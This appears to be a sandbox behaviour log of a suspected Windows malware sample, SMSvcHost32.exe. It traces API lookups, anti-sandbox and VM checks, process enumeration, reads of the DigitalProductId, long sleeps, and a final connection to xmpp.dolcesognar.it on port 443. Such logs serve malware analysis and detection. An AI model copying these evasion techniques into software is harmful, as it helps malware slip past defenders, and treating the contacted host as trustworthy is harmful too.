| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Module | Get Handle | module_name = Secur32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x6ff60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shell32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = 680, address_out = 0x753cdb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x771d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 |
Thread 0x614
12
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Module | Get Filename | module_name = Secur32.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Mutex | Open | mutex_name = ServiceEntryPointThread, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Mutex | Create | mutex_name = ServiceEntryPointThread |
|
1 |
Thread 0xef0
119
3
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = MP3 file corrupted |
|
1 | ||
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Hardware\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Hardware\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Module | Load | module_name = RPCRT4.dll, base_address = 0x75070000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreateSequential, address_out = 0x7507db30 |
|
1 | |
| Module | Get Handle | module_name = dbghelp.dll, base_address = 0x0 |
|
1 | |
| Module | Get Handle | module_name = sbiedll.dll, base_address = 0x0 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, value_name = SystemBiosVersion, data = 4411304, type = REG_MULTI_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, value_name = VideoBiosVersion, data = 71, type = REG_NONE |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion, value_name = SystemBiosVersion, data = 71, type = REG_NONE |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x779d7000 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x765b9f10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
2 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualQuery, address_out = 0x765b7a90 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId, data = 164 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 63 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Environment | Set Environment String | name = USERNAME, value = Nd9E1FYi |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcess, address_out = 0x779d6f00 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcessToken, address_out = 0x779d7e10 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwQueryInformationToken, address_out = 0x779d6eb0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
6 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Bind | protocol = IPPROTO_IP, local_address = 127.0.0.1, local_port = 4356 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Environment | Set Environment String | name = standalonemtm, value = true |
|
1 | |
| Environment | Set Environment String | name = vendor_id, value = exe_scheduler_3007 |
|
1 | |
| Environment | Set Environment String | name = mainprocessoverride, value = svchost.exe |
|
1 | |
| Environment | Set Environment String | name = RandomListenPortBase, value = 6000 |
|
1 |
Thread 0xdd8
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 50000 milliseconds (50.000 seconds) |
|
1 | |
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = OGG 0 |
|
1 |
Thread 0xedc
185
146
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 512, size_out = 512 |
|
249 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, type = size |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 251392, size_out = 251392 |
|
1 | |
| System | Sleep | duration = 600000 milliseconds (600.000 seconds) |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 512, size_out = 512 |
|
249 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, type = size |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 251392, size_out = 251392 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = xmpp.dolcesognar.it, server_port = 443 |
|
1 | |
